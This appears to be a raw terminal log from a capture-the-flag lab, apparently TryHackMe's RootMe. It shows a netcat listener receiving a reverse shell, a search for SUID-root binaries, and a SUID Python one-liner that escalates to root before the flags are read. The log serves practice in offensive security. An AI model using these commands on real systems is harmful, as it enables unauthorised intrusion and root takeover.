└─$ nc -lvnp 3333              
listening on [any] 3333 ...
connect to [10.8.78.245] from (UNKNOWN) [10.10.215.13] 60178
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:08:29 up 23 min,  0 users,  load average: 0.00, 0.05, 0.32
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cd var
$ cd www
$ ls
html
user.txt
$ cat user.txt  
THM{y0u_g0t_a_sh3ll}
$ find / -user root -perm /4000 2>/dev/null
..
..
/usr/bin/python
..
$ cd /usr/bin/
$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
root
cd root 
ls
root.txt
cat root.txt
THM{pr1v1l3g3_3sc4l4t10n}